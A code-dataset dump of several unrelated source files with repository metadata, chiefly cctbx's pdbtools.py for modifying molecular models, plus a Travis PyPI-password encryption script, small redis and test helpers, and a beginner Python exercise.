def update_hoster_progress(email, app_id, step):
list_id = 'hoster'
if HosterSteps.should_archive(step):
_remove_list(email, app_id, list_id)
return
progress = HosterSteps.get_progress(step)
_update_list(email, app_id, list_id, progress)
@returns()
@arguments(email=unicode, app_id=unicode, step=unicode)
def update_investor_progress(email, app_id, step):
list_id = 'investor'
if InvestorSteps.should_archive(step):
_remove_list(email, app_id, list_id)
return
progress = InvestorSteps.get_progress(step)
_update_list(email, app_id, list_id, progress)
@returns()
@arguments(email=unicode, app_id=unicode, list_id=unicode, progress=dict)
def _update_list(email, app_id, list_id, progress):
user_data_keys = ['todo_lists']
api_key = get_tf_token_api_key()
current_user_data = system.get_user_data(api_key, email, app_id, user_data_keys)
user_data = {}
if not current_user_data.get('todo_lists'):
user_data['todo_lists'] = [list_id]
elif list_id not in current_user_data.get('todo_lists'):
user_data['todo_lists'] = current_user_data.get('todo_lists') + [list_id]
user_data['todo_%s' % list_id] = progress
put_user_data(api_key, email, app_id, user_data)
@returns()
@arguments(email=unicode, app_id=unicode, list_id=unicode)
def _remove_list(email, app_id, list_id):
user_data_keys = ['todo_lists']
api_key = get_tf_token_api_key()
current_user_data = system.get_user_data(api_key, email, app_id, user_data_keys)
todo_lists = current_user_data.get('todo_lists') or []
if list_id in todo_lists:
todo_lists.remove(list_id)
user_data = {'todo_lists': todo_lists}
put_user_data(api_key, email, app_id, user_data)
system.del_user_data(api_key, email, app_id, ['todo_%s' % list_id])
| 35.614458
| 84
| 0.743572
|
dc5bd4d485a347280a524d889f9db0a688004898
| 25,993
|
py
|
Python
|
mmtbx/pdbtools.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 155
|
2016-11-23T12:52:16.000Z
|
2022-03-31T15:35:44.000Z
|
mmtbx/pdbtools.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 590
|
2016-12-10T11:31:18.000Z
|
2022-03-30T23:10:09.000Z
|
mmtbx/pdbtools.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 115
|
2016-11-15T08:17:28.000Z
|
2022-02-09T15:30:14.000Z
|
from __future__ import absolute_import, division, print_function
import iotbx.phil
from cctbx import crystal
from mmtbx.refinement import rigid_body
from cctbx.array_family import flex
from libtbx.utils import Sorry
import random
import scitbx.matrix
import sys
import scitbx.rigid_body
from libtbx import group_args
import mmtbx.monomer_library.server
import mmtbx.utils
mon_lib_srv = mmtbx.monomer_library.server.server()
master_params_str = """\
modify
.short_caption = Modify starting model
.style = menu_item scrolled auto_align
{
remove = None
.type = atom_selection
.help = Selection for the atoms to be removed
.short_caption=Remove atom selection
.input_size=400
.style = bold noauto
keep = None
.type = atom_selection
.help = Select atoms to keep
.short_caption=Keep only atom selection
.input_size=400
.style = bold noauto
put_into_box_with_buffer = None
.type = float
.help = Move molecule into center of box
selection = None
.type = atom_selection
.help = Selection for atoms to be modified
.short_caption = Modify atom selection
.input_size=400
.style = bold noauto
flip_symmetric_amino_acids = False
.type = bool
.short_caption = Flip symmetric amino acid side chains
.help = Flip symmetric amino acid side chains
adp
.help = Scope of options to modify ADP of selected atoms
.multiple = True
.short_caption=Modify ADPs
.style = auto_align menu_item parent_submenu:model_modifications noauto
{
atom_selection = None
.type = atom_selection
.help = Selection for atoms to be modified. \\
Overrides parent-level selection.
.short_caption = Modify ADPs for selection
.input_size=400
.style = bold
randomize = False
.type = bool
.help = Randomize ADP within a certain range
.short_caption=Randomize ADPs
set_b_iso = None
.type = float
.help = Set ADP of atoms to set_b_iso
.short_caption=Set isotropic B to
.input_size = 64
convert_to_isotropic = False
.type = bool
.help = Convert atoms to isotropic
convert_to_anisotropic = False
.type = bool
.help = Convert atoms to anisotropic
shift_b_iso = None
.type = float
.help = Add shift_b_iso value to ADP
.short_caption=Increase B_iso by
scale_adp = None
.type = float
.help = Multiply ADP by scale_adp
.short_caption=ADP scale factor
}
sites
.help = Scope of options to modify coordinates of selected atoms
.multiple = True
.short_caption=Modify coordinates
.style = auto_align noauto menu_item parent_submenu:model_modifications
{
atom_selection = None
.type = atom_selection
.help = Selection for atoms to be modified. \\
Overrides parent-level selection.
.input_size=400
.short_caption = Modify sites for selection
.style = bold
shake = None
.type = float
.help = Randomize coordinates with mean error value equal to shake
.short_caption = Randomize coordinates (mean value)
switch_rotamers = max_distant min_distant exact_match fix_outliers
.type=choice(multi=False)
translate = 0 0 0
.type = floats(size=3)
.optional = False
.help = Translational shift (x,y,z)
rotate = 0 0 0
.type = floats(size=3)
.optional = False
.help = Rotational shift (x,y,z)
euler_angle_convention = *xyz zyz
.type = choice
.help = Euler angles convention to be used for rotation
}
occupancies
.help = Scope of options to modify occupancies of selected atoms
.multiple = True
.short_caption=Modify occupancies
.style = noauto menu_item parent_submenu:model_modifications
{
atom_selection = None
.type = atom_selection
.help = Selection for atoms to be modified. \\
Overrides parent-level selection.
.input_size=400
.short_caption = Modify sites for selection
.style = bold
randomize = False
.type = bool
.help = Randomize occupancies within a certain range
.short_caption = Randomize occupancies
set = None
.type = float
.help = Set all or selected occupancies to given value
.short_caption=Set occupancies to
.input_size = 64
}
rotate_about_axis
.style = box auto_align
{
axis = None
.type = str
angle = None
.type = float
atom_selection = None
.type = str
}
change_of_basis = None
.type = str
.short_caption = Change of basis operator
.help = Apply change-of-basis operator (e.g. reindexing operator) to \
the coordinates and symmetry. Example: 'a,c,b'.
renumber_residues = False
.type = bool
.help = Re-number residues
increment_resseq = None
.type = int
.help = Increment residue number
.short_caption = Increment residue numbers by
truncate_to_polyala = False
.type = bool
.help = Truncate a model to poly-Ala.
.short_caption = Truncate to poly-Ala
.style = noauto
truncate_to_polygly = False
.type = bool
.help = Truncate a model to poly-Gly.
.short_caption = Truncate to poly-Gly
.style = noauto
remove_alt_confs = False
.type = bool
.help = Deletes atoms whose altloc identifier is not blank or 'A', and \
resets the occupancies of the remaining atoms to 1.0.
.short_caption = Remove alternate conformers
.style = noauto
always_keep_one_conformer = False
.type = bool
.help = Modifies behavior of remove_alt_confs so that residues with no \
conformer labeled blank or A are not deleted. Silent if remove_alt_confs \
is False.
set_chemical_element_simple_if_necessary = None
.type = bool
.short_caption = Guess element field if necessary
.help = Make a simple guess about what the chemical element is (based on \
atom name and the way how it is formatted) and write it into output file.
set_seg_id_to_chain_id = False
.type = bool
.short_caption = Set segID to chain ID
.help = Sets the segID field to the chain ID (padded with spaces).
.style = noauto
clear_seg_id = False
.type = bool
.short_caption = Clear segID field
.help = Erases the segID field.
.style = noauto
convert_semet_to_met = False
.type = bool
.short_caption = Convert SeMet residues to Met
.style = noauto
convert_met_to_semet = False
.type = bool
.short_caption = Convert Met residues to SeMet
.style = noauto
rename_chain_id
.help = Rename chains
.short_caption = Rename chain ID
.style = box
{
old_id = None
.type = str
.input_size = 50
.short_caption = Old ID
new_id = None
.type = str
.input_size = 50
.short_caption = New ID
}
set_charge
.short_caption = Set atomic charge
.style = box auto_align
{
charge_selection = None
.type = atom_selection
.short_caption = Atom selection
charge = None
.type = int(value_max=7,value_min=-3)
}
neutralize_scatterers = False
.type = bool
.short_caption = Neutralize all atoms in the model
remove_fraction = None
.short_caption = Remove atoms randomly (fraction)
.type = float
random_seed = None
.type = int
.help = Random seed
move_waters_last = False
.type = bool
.short_caption = Move waters to end of model
.help = Transfer waters to the end of the model. Addresses some \
limitations of water picking in phenix.refine.
}
"""
def master_params():
return iotbx.phil.parse(master_params_str, process_includes=False)
class modify(object):
def __init__(self, model, params, log = None):
self.log = log
self.params = params
self.model = model
self._neutralize_scatterers()
if not model.crystal_symmetry() or not model.crystal_symmetry().unit_cell():
# Make it up
from cctbx.maptbx.box import shift_and_box_model
model = shift_and_box_model(model, shift_model=False)
self.pdb_hierarchy = model.get_hierarchy()
self.crystal_symmetry = model.crystal_symmetry()
if(self.log is None): self.log = sys.stdout
self.xray_structure = model.get_xray_structure()
asc = self.pdb_hierarchy.atom_selection_cache(
special_position_settings=crystal.special_position_settings(
crystal_symmetry = self.crystal_symmetry))
if(self.params.random_seed is not None):
random.seed(self.params.random_seed)
flex.set_random_seed(self.params.random_seed)
self.top_selection = flex.smart_selection(
flags=flex.bool(self.xray_structure.scatterers().size(), True))
if(self.params.selection is not None):
self.top_selection = flex.smart_selection(
flags=asc.selection(self.params.selection))
self._rotate_about_axis()
self._process_adp()
self._process_sites()
self._process_occupancies()
self._put_in_box()
self._change_of_basis()
# Up to this point we are done with self.xray_structure
self.model.set_xray_structure(self.xray_structure)
self.pdb_hierarchy = self.model.get_hierarchy()
# Now only manipulations that use self.pdb_hierarchy are done
### segID manipulations
if (params.set_seg_id_to_chain_id):
if (params.clear_seg_id):
raise Sorry("Parameter conflict - set_seg_id_to_chain_id=True and "+
"clear_seg_id=True. Please choose only one of these options.")
for atom in self.pdb_hierarchy.atoms():
labels = atom.fetch_labels()
atom.segid = "%-4s" % labels.chain_id
elif (params.clear_seg_id):
for atom in self.pdb_hierarchy.atoms():
atom.segid = " "
if(self.params.set_chemical_element_simple_if_necessary or
self.params.rename_chain_id.old_id or
self.params.renumber_residues or self.params.increment_resseq or
self.params.convert_semet_to_met or
self.params.convert_met_to_semet or
self.params.set_charge.charge or
self.params.truncate_to_polyala or
self.params.truncate_to_polygly or
self.params.remove_alt_confs or
self.params.move_waters_last or
self.params.remove_fraction or
self.params.keep or
self.params.remove):
# del self.xray_structure # it is invalide below this point
self._set_chemical_element_simple_if_necessary()
self._rename_chain_id()
self._renumber_residues()
self._convert_semet_to_met()
self._convert_met_to_semet()
self._set_atomic_charge()
self._truncate_to_poly_ala()
self._truncate_to_poly_gly()
self._remove_alt_confs()
self._move_waters()
self._remove_atoms()
self._apply_keep_remove()
# Here goes really nasty hack. Never repeat it.
# It is here because I don't have clear idea about how to handle
# such dramatic changes in number of atoms etc that just was performed
# for hierarchy.
self.pdb_hierarchy.reset_atom_i_seqs()
self.pdb_hierarchy.atoms_reset_serial()
self.model._pdb_hierarchy = self.pdb_hierarchy
self.model._xray_structure = self.pdb_hierarchy.extract_xray_structure(
crystal_symmetry=self.model.crystal_symmetry())
self.model._update_atom_selection_cache()
self.model._update_has_hd()
self.model.get_hierarchy().atoms().reset_i_seq()
def _apply_keep_remove(self):
cn = [self.params.remove, self.params.keep].count(None)
if(not cn in [1,2]):
raise Sorry("'keep' and 'remove' keywords cannot be used simultaneously.")
s1 = self.pdb_hierarchy.atoms_size()
if(self.params.remove is not None):
asc = self.pdb_hierarchy.atom_selection_cache(
special_position_settings=crystal.special_position_settings(
crystal_symmetry = self.crystal_symmetry))
sel = ~asc.selection(self.params.remove)
self.pdb_hierarchy = self.pdb_hierarchy.select(sel)
s2 = self.pdb_hierarchy.atoms_size()
print("Size before:", s1, "size after:", s2, file=self.log)
if(self.params.keep is not None):
asc = self.pdb_hierarchy.atom_selection_cache(
special_position_settings=crystal.special_position_settings(
crystal_symmetry = self.crystal_symmetry))
sel = asc.selection(self.params.keep)
self.pdb_hierarchy = self.pdb_hierarchy.select(sel)
s2 = self.pdb_hierarchy.atoms_size()
print("Size before:", s1, "size after:", s2, file=self.log)
def _change_of_basis(self):
if(self.params.change_of_basis is not None):
print("Applying change-of-basis operator '%s'" % \
self.params.change_of_basis, file=self.log)
from cctbx import sgtbx
cb_op = sgtbx.change_of_basis_op(self.params.change_of_basis)
self.xray_structure = self.xray_structure.change_basis(cb_op)
self.pdb_hierarchy.atoms().set_xyz(self.xray_structure.sites_cart())
print("New symmetry:", file=self.log)
self.xray_structure.crystal_symmetry().show_summary(f=self.log, prefix=" ")
self.crystal_symmetry = self.xray_structure.crystal_symmetry()
def _move_waters(self):
if(self.params.move_waters_last):
print("Moving waters to end of model", file=self.log)
if (len(self.pdb_hierarchy.models()) > 1):
raise Sorry("Rearranging water molecules is not supported for "+
"multi-MODEL structures.")
sel_cache = self.pdb_hierarchy.atom_selection_cache(
special_position_settings=crystal.special_position_settings(
crystal_symmetry = self.crystal_symmetry))
water_sel = sel_cache.selection("resname HOH or resname WAT") # BAD XXX
n_waters = water_sel.count(True)
if (n_waters == 0):
print("No waters found, skipping", file=self.log)
else :
print("%d atoms will be moved." % n_waters, file=self.log)
hierarchy_water = self.pdb_hierarchy.select(water_sel)
hierarchy_non_water = self.pdb_hierarchy.select(~water_sel)
for chain in hierarchy_water.only_model().chains():
hierarchy_non_water.only_model().append_chain(chain.detached_copy())
self.pdb_hierarchy = hierarchy_non_water # does this work?
def _remove_alt_confs(self):
if(self.params.remove_alt_confs):
print("Remove altlocs", file=self.log)
always_keep_one_conformer = self.params.always_keep_one_conformer
self.pdb_hierarchy.remove_alt_confs(
always_keep_one_conformer = self.params.always_keep_one_conformer)
def _truncate_to_poly_gly(self):
if(self.params.truncate_to_polygly):
print("Truncate to poly-gly", file=self.log)
self.pdb_hierarchy.truncate_to_poly_gly()
def _truncate_to_poly_ala(self):
if(self.params.truncate_to_polyala):
print("Truncate to poly-ala", file=self.log)
self.pdb_hierarchy.truncate_to_poly_ala()
def _set_atomic_charge(self):
if(self.params.set_charge.charge_selection is not None):
print("Setting atomic charge", file=self.log)
selection = self.params.set_charge.charge_selection
charge = self.params.set_charge.charge
sel_cache = self.pdb_hierarchy.atom_selection_cache(
special_position_settings=crystal.special_position_settings(
crystal_symmetry = self.crystal_symmetry))
isel = sel_cache.selection(selection).iselection()
self.pdb_hierarchy.set_atomic_charge(iselection=isel, charge=charge)
def _convert_met_to_semet(self):
if(self.params.convert_met_to_semet):
print("Convert MET->MSE", file=self.log)
self.pdb_hierarchy.convert_met_to_semet()
def _convert_semet_to_met(self):
if(self.params.convert_semet_to_met):
print("Convert MSE->MET", file=self.log)
self.pdb_hierarchy.convert_semet_to_met()
def _renumber_residues(self):
if((self.params.increment_resseq) or
(self.params.renumber_residues)):
print("Re-numbering residues", file=self.log)
renumber_from = self.params.increment_resseq
atom_selection = self.params.selection
pdb_hierarchy = self.pdb_hierarchy
selected_i_seqs = None
if (atom_selection is not None):
sel_cache = pdb_hierarchy.atom_selection_cache(
special_position_settings=crystal.special_position_settings(
crystal_symmetry = self.crystal_symmetry))
selected_i_seqs = sel_cache.selection(atom_selection).iselection()
for model in pdb_hierarchy.models():
for chain in model.chains():
if (selected_i_seqs is not None):
chain_i_seqs = chain.atoms().extract_i_seq()
intersection = selected_i_seqs.intersection(chain_i_seqs)
if (len(intersection) == 0):
continue
elif (len(intersection) != len(chain_i_seqs)):
print("Warning: chain '%s' is only partially selected (%d out of %d) - will not renumber." % (chain.id, len(intersection), len(chain_i_seqs)), file=self.log)
continue
if (renumber_from is None):
counter = 1
for rg in chain.residue_groups():
rg.resseq=counter
counter += 1
else :
for rg in chain.residue_groups():
resseq = rg.resseq_as_int()
resseq += renumber_from
rg.resseq = "%4d" % resseq
def _rename_chain_id(self):
if([self.params.rename_chain_id.old_id,
self.params.rename_chain_id.new_id].count(None)==0):
print("Rename chain id", file=self.log)
print("old_id= '%s'"%self.params.rename_chain_id.old_id, file=self.log)
print("new_id= '%s'"%self.params.rename_chain_id.new_id, file=self.log)
self.pdb_hierarchy.rename_chain_id(
old_id = self.params.rename_chain_id.old_id,
new_id = self.params.rename_chain_id.new_id)
def _set_chemical_element_simple_if_necessary(self):
if(self.params.set_chemical_element_simple_if_necessary):
print("Set chemical element", file=self.log)
self.pdb_hierarchy.atoms().set_chemical_element_simple_if_necessary()
def _remove_atoms(self):
if(self.params.remove_fraction is not None):
self.pdb_hierarchy = \
self.pdb_hierarchy.remove_atoms(fraction=self.params.remove_fraction)
def _put_in_box(self):
if(self.params.put_into_box_with_buffer is not None):
result = \
self.xray_structure.orthorhombic_unit_cell_around_centered_scatterers(
buffer_size = self.params.put_into_box_with_buffer)
self.xray_structure.replace_scatterers(result.scatterers())
def _print_action(self, text, selection):
print("%s: selected atoms: %s" % (
text, selection.format_summary()), file=self.log)
def _process_adp(self):
for adp in self.params.adp:
if (adp.atom_selection is None):
selection = self.top_selection
else:
asc = self.pdb_hierarchy.atom_selection_cache(
special_position_settings=crystal.special_position_settings(
crystal_symmetry = self.crystal_symmetry))
sel = asc.selection(adp.atom_selection)
selection = flex.smart_selection(flags=sel)
if (adp.convert_to_isotropic):
self._convert_to_isotropic(selection=selection)
if (adp.convert_to_anisotropic):
self._convert_to_anisotropic(selection=selection)
self._set_b_iso(selection=selection, b_iso=adp.set_b_iso)
self._scale_adp(selection=selection, factor=adp.scale_adp)
self._shift_b_iso(selection=selection, shift=adp.shift_b_iso)
if (adp.randomize):
self._randomize_adp(selection=selection)
def _convert_to_isotropic(self, selection):
self._print_action(
text = "Converting to isotropic ADP",
selection = selection)
self.xray_structure.convert_to_isotropic(selection=selection.indices)
def _convert_to_anisotropic(self, selection):
self._print_action(
text = "Converting to anisotropic ADP",
selection = selection)
self.xray_structure.convert_to_anisotropic(selection=selection.flags)
def _set_b_iso(self, selection, b_iso):
if (b_iso is not None):
self._print_action(
text = "Setting all isotropic ADP = %.3f" % b_iso,
selection = selection)
self.xray_structure.set_b_iso(value=b_iso, selection=selection.flags)
def _scale_adp(self, selection, factor):
if (factor is not None):
self._print_action(
text = "Multiplying all ADP with factor = %.6g" % factor,
selection = selection)
self.xray_structure.scale_adp(factor=factor, selection=selection.flags)
def _shift_b_iso(self, selection, shift):
if (shift is not None):
self._print_action(
text = "Adding shift = %.2f to all ADP" % shift,
selection = selection)
self.xray_structure.shift_us(b_shift=shift, selection=selection.indices)
def _randomize_adp(self, selection):
self._print_action(
text = "Randomizing ADP",
selection = selection)
self.xray_structure.shake_adp(selection=selection.flags)
def _process_sites(self):
if(self.params.flip_symmetric_amino_acids):
self.pdb_hierarchy.flip_symmetric_amino_acids()
self.xray_structure.set_sites_cart(
sites_cart = self.pdb_hierarchy.atoms().extract_xyz())
for sites in self.params.sites:
if (sites.atom_selection is None):
selection = self.top_selection
else:
asc = self.pdb_hierarchy.atom_selection_cache(
special_position_settings=crystal.special_position_settings(
crystal_symmetry = self.crystal_symmetry))
sel = asc.selection(sites.atom_selection)
selection = flex.smart_selection(flags=sel)
self._shake_sites(selection=selection, rms_difference=sites.shake)
self._switch_rotamers(selection=selection, mode=sites.switch_rotamers)
self._rb_shift(
selection=selection,
translate=sites.translate,
rotate=sites.rotate,
euler_angle_convention=sites.euler_angle_convention)
def _switch_rotamers(self, selection, mode):
if(mode is None): return
self._print_action(
text = "Switching rotamers; mode = %s"%mode,
selection = selection)
self.pdb_hierarchy.atoms().set_xyz(self.xray_structure.sites_cart())
self.pdb_hierarchy = mmtbx.utils.switch_rotamers(
pdb_hierarchy=self.pdb_hierarchy,
mode=mode,
selection=selection.flags)
self.xray_structure.set_sites_cart(
sites_cart = self.pdb_hierarchy.atoms().extract_xyz())
def _shake_sites(self, selection, rms_difference):
if (rms_difference is not None):
self._print_action(
text = "Shaking sites (RMS = %.3f)" % rms_difference,
selection = selection)
self.xray_structure.shake_sites_in_place(
rms_difference=rms_difference,
selection=selection.flags)
def _rb_shift(self, selection, translate, rotate, euler_angle_convention):
trans = [float(i) for i in translate]
rot = [float(i) for i in rotate]
if(len(trans) != 3): raise Sorry("Wrong value: translate= " + translate)
if(len(rot) != 3): raise Sorry("Wrong value: translate= " + rotate)
if ( trans[0] != 0 or trans[1] != 0 or trans[2] != 0
or rot[0] != 0 or rot[1] != 0 or rot[2] != 0):
self._print_action(
text = "Rigid body shift",
selection = selection)
if (euler_angle_convention == "zyz"):
rot_obj = scitbx.rigid_body.rb_mat_zyz(
phi = rot[0],
psi = rot[1],
the = rot[2])
else:
rot_obj = scitbx.rigid_body.rb_mat_xyz(
phi = rot[0],
psi = rot[1],
the = rot[2])
self.xray_structure.apply_rigid_body_shift(
rot = rot_obj.rot_mat().as_mat3(),
trans = trans,
selection = selection.indices)
def _process_occupancies(self):
def check_if_already_modified():
if(self.top_selection): return
if (self._occupancies_modified):
raise Sorry("Can't modify occupancies (already modified).")
else:
self._occupancies_modified = True
for occ in self.params.occupancies:
if(occ.atom_selection is None):
selection = self.top_selection
else:
asc = self.pdb_hierarchy.atom_selection_cache(
special_position_settings=crystal.special_position_settings(
crystal_symmetry = self.crystal_symmetry))
sel = asc.selection(occ.atom_selection)
selection = flex.smart_selection(flags=sel)
if(occ.randomize):
self._print_action(
text = "Randomizing occupancies",
selection = selection)
check_if_already_modified()
self.xray_structure.shake_occupancies(selection=selection.flags)
if(occ.set is not None):
self._print_action(
text = "Setting occupancies to: %8.3f"%occ.set, selection = selection)
check_if_already_modified()
self.xray_structure.set_occupancies(
value = occ.set,
selection = selection.flags)
def _rotate_about_axis(self):
raap = self.params.rotate_about_axis
sites_cart = self.xray_structure.sites_cart()
if([raap.axis, raap.atom_selection, raap.angle].count(None)==0):
axis = []
try:
for a in raap.axis.split():
axis.append(float(a))
except Exception:
asc = self.pdb_hierarchy.atom_selection_cache()
sel = asc.selection(raap.axis)
axis = [i for i in sites_cart.select(sel).as_double()]
if(len(axis)!=6):
raise Sorry("Bad selection rotate_about_axis.axis: %s"%str(raap.axis))
p1 = scitbx.matrix.col(axis[:3])
p2 = scitbx.matrix.col(axis[3:])
raa = p1.rt_for_rotation_around_axis_through(
point=p2, angle=raap.angle, deg=True)
asc = self.pdb_hierarchy.atom_selection_cache()
sel = asc.selection(raap.atom_selection)
if(sel.count(True)==0):
raise Sorry(
"Empty selection rotate_about_axis.selection: %s"%str(raap.atom_selection))
sites_cart_rotated = raa * sites_cart.select(sel)
self.xray_structure.set_sites_cart(
sites_cart.set_selected(sel, sites_cart_rotated))
def _neutralize_scatterers(self):
if self.params.neutralize_scatterers:
self.model.neutralize_scatterers()
def get_results(self):
return group_args(
model = self.model,
# pdb_hierarchy = self.pdb_hierarchy,
# crystal_symmetry = self.crystal_symmetry,
)
| 37.725689
| 171
| 0.699111
|
11072bc808e03b267b82f207213b9bb3e6ee2728
| 3,757
|
py
|
Python
|
travis_pypi_setup.py
|
takeontom/PyLuxafor
|
38f4107226e3ae0c71a7d3291a493be4d5d612e1
|
[
"MIT"
] | 8
|
2018-04-06T13:35:04.000Z
|
2020-12-14T19:27:44.000Z
|
travis_pypi_setup.py
|
takeontom/PyLuxafor
|
38f4107226e3ae0c71a7d3291a493be4d5d612e1
|
[
"MIT"
] | 380
|
2016-12-14T22:08:42.000Z
|
2022-03-28T09:03:19.000Z
|
travis_pypi_setup.py
|
takeontom/PyLuxafor
|
38f4107226e3ae0c71a7d3291a493be4d5d612e1
|
[
"MIT"
] | 7
|
2017-06-01T19:35:35.000Z
|
2020-06-12T21:39:45.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Update encrypted deploy password in Travis config file
"""
from __future__ import print_function
import base64
import json
import os
from getpass import getpass
import yaml
from cryptography.hazmat.primitives.serialization import load_pem_public_key
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric.padding import PKCS1v15
try:
from urllib import urlopen
except:
from urllib.request import urlopen
GITHUB_REPO = 'takeontom/pyluxafor'
TRAVIS_CONFIG_FILE = os.path.join(
os.path.dirname(os.path.abspath(__file__)), '.travis.yml')
def load_key(pubkey):
"""Load public RSA key, with work-around for keys using
incorrect header/footer format.
Read more about RSA encryption with cryptography:
https://cryptography.io/latest/hazmat/primitives/asymmetric/rsa/
"""
try:
return load_pem_public_key(pubkey.encode(), default_backend())
except ValueError:
# workaround for https://github.com/travis-ci/travis-api/issues/196
pubkey = pubkey.replace('BEGIN RSA', 'BEGIN').replace('END RSA', 'END')
return load_pem_public_key(pubkey.encode(), default_backend())
def encrypt(pubkey, password):
"""Encrypt password using given RSA public key and encode it with base64.
The encrypted password can only be decrypted by someone with the
private key (in this case, only Travis).
"""
key = load_key(pubkey)
encrypted_password = key.encrypt(password, PKCS1v15())
return base64.b64encode(encrypted_password)
def fetch_public_key(repo):
"""Download RSA public key Travis will use for this repo.
Travis API docs: http://docs.travis-ci.com/api/#repository-keys
"""
keyurl = 'https://api.travis-ci.org/repos/{0}/key'.format(repo)
data = json.loads(urlopen(keyurl).read().decode())
if 'key' not in data:
errmsg = "Could not find public key for repo: {}.\n".format(repo)
errmsg += "Have you already added your GitHub repo to Travis?"
raise ValueError(errmsg)
return data['key']
def prepend_line(filepath, line):
"""Rewrite a file adding a line to its beginning.
"""
with open(filepath) as f:
lines = f.readlines()
lines.insert(0, line)
with open(filepath, 'w') as f:
f.writelines(lines)
def load_yaml_config(filepath):
with open(filepath) as f:
return yaml.load(f)
def save_yaml_config(filepath, config):
with open(filepath, 'w') as f:
yaml.dump(config, f, default_flow_style=False)
def update_travis_deploy_password(encrypted_password):
"""Update the deploy section of the .travis.yml file
to use the given encrypted password.
"""
config = load_yaml_config(TRAVIS_CONFIG_FILE)
config['deploy']['password'] = dict(secure=encrypted_password)
save_yaml_config(TRAVIS_CONFIG_FILE, config)
line = ('# This file was autogenerated and will overwrite'
' each time you run travis_pypi_setup.py\n')
prepend_line(TRAVIS_CONFIG_FILE, line)
def main(args):
public_key = fetch_public_key(args.repo)
password = args.password or getpass('PyPI password: ')
update_travis_deploy_password(encrypt(public_key, password.encode()))
print("Wrote encrypted password to .travis.yml -- you're ready to deploy")
if '__main__' == __name__:
import argparse
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('--repo', default=GITHUB_REPO,
help='GitHub repo (default: %s)' % GITHUB_REPO)
parser.add_argument('--password',
help='PyPI password (will prompt if not provided)')
args = parser.parse_args()
main(args)
| 30.544715
| 79
| 0.700559
|
dd1dff33dd336c58f6616b4e5ccac9cf20b34866
| 193
|
py
|
Python
|
redis/commands/search/_util.py
|
barshaul/redis-py
|
bf3d21d1626297d55e43d79d75d1668d3d4dc111
|
[
"MIT"
] | 483
|
2021-10-11T22:11:32.000Z
|
2022-03-31T20:30:32.000Z
|
redis/commands/search/_util.py
|
barshaul/redis-py
|
bf3d21d1626297d55e43d79d75d1668d3d4dc111
|
[
"MIT"
] | 423
|
2021-10-13T09:07:29.000Z
|
2022-03-31T09:13:03.000Z
|
redis/commands/search/_util.py
|
barshaul/redis-py
|
bf3d21d1626297d55e43d79d75d1668d3d4dc111
|
[
"MIT"
] | 148
|
2021-10-19T09:43:51.000Z
|
2022-03-30T16:35:53.000Z
|
def to_string(s):
if isinstance(s, str):
return s
elif isinstance(s, bytes):
return s.decode("utf-8", "ignore")
else:
return s # Not a string we care about
| 24.125
| 46
| 0.57513
|
b1fc81413080b93b2a5e710dfe27fdd773f55449
| 497
|
py
|
Python
|
tests/test_airbnb_db.py
|
karthikramasamy/cmpe272-project
|
bd11184ecb2630c853f01c0af24e6be308837396
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_airbnb_db.py
|
karthikramasamy/cmpe272-project
|
bd11184ecb2630c853f01c0af24e6be308837396
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_airbnb_db.py
|
karthikramasamy/cmpe272-project
|
bd11184ecb2630c853f01c0af24e6be308837396
|
[
"BSD-3-Clause"
] | null | null | null |
import pytest
from airbnb.airbnb_db import get_db
def test_get_close_db(app):
with app.app_context():
db = get_db()
assert db is get_db()
def test_init_db_command(runner, monkeypatch):
class Recorder(object):
called = False
def fake_init_db():
Recorder.called = True
monkeypatch.setattr('airbnb.airbnb_db.init_db', fake_init_db)
result = runner.invoke(args=['init-db'])
assert 'Initialized' in result.output
assert Recorder.called
| 22.590909
| 65
| 0.688129
|
0417bc9d5029e303393e3da18d7de708a1d60567
| 288
|
py
|
Python
|
src/corpus/audible.py
|
tiefenauer/ip9
|
4d50ee288f8a00f64a6f4a7d80639d3dc89df4e8
|
[
"MIT"
] | 4
|
2019-06-02T02:56:38.000Z
|
2021-11-06T02:29:26.000Z
|
src/corpus/audible.py
|
tiefenauer/ip9
|
4d50ee288f8a00f64a6f4a7d80639d3dc89df4e8
|
[
"MIT"
] | null | null | null |
src/corpus/audible.py
|
tiefenauer/ip9
|
4d50ee288f8a00f64a6f4a7d80639d3dc89df4e8
|
[
"MIT"
] | null | null | null |
from abc import ABC, abstractmethod
class Audible(ABC):
"""
Base class for corpus objects that contain an audio signal
"""
@property
@abstractmethod
def audio(self):
return None
@property
@abstractmethod
def rate(self):
return None
| 16
| 62
| 0.628472
|
387f5f68773cea65dac2ac72a4ad9ff7b17ef7bb
| 388
|
py
|
Python
|
src/Python/02_Instrukcje_sterujace/Zad4.py
|
djeada/Nauka-programowania
|
b1eb6840c15b830acf552f0a0fc5cc692759152f
|
[
"MIT"
] | 3
|
2020-09-19T21:38:30.000Z
|
2022-03-30T11:02:26.000Z
|
src/Python/02_Instrukcje_sterujace/Zad4.py
|
djeada/Nauka-programowania
|
b1eb6840c15b830acf552f0a0fc5cc692759152f
|
[
"MIT"
] | null | null | null |
src/Python/02_Instrukcje_sterujace/Zad4.py
|
djeada/Nauka-programowania
|
b1eb6840c15b830acf552f0a0fc5cc692759152f
|
[
"MIT"
] | 1
|
2022-02-04T09:13:20.000Z
|
2022-02-04T09:13:20.000Z
|
"""
Dla dwoch pobranych liczb, wypisz najpierw wieksza potem mniejsza.
"""
if __name__ == "__main__":
print("podaj dwie liczby")
a = int(input())
b = int(input())
if a < b:
print(b)
print(a)
print(" druga liczba jest wieksza od pierwszej")
else:
print(a)
print(b)
print("druga liczba nie jest wieksza od pierwszej")
| 19.4
| 66
| 0.574742
|
e32ba67705619d662ba423da32ccb828f3111589
| 3,689
|
bzl
|
Python
|
apple/internal/resource_actions/metals.bzl
|
mccorkill1/rules_apple
|
8562971108c11931618a220731c335e9fab9fb49
|
[
"Apache-2.0"
] | null | null | null |
apple/internal/resource_actions/metals.bzl
|
mccorkill1/rules_apple
|
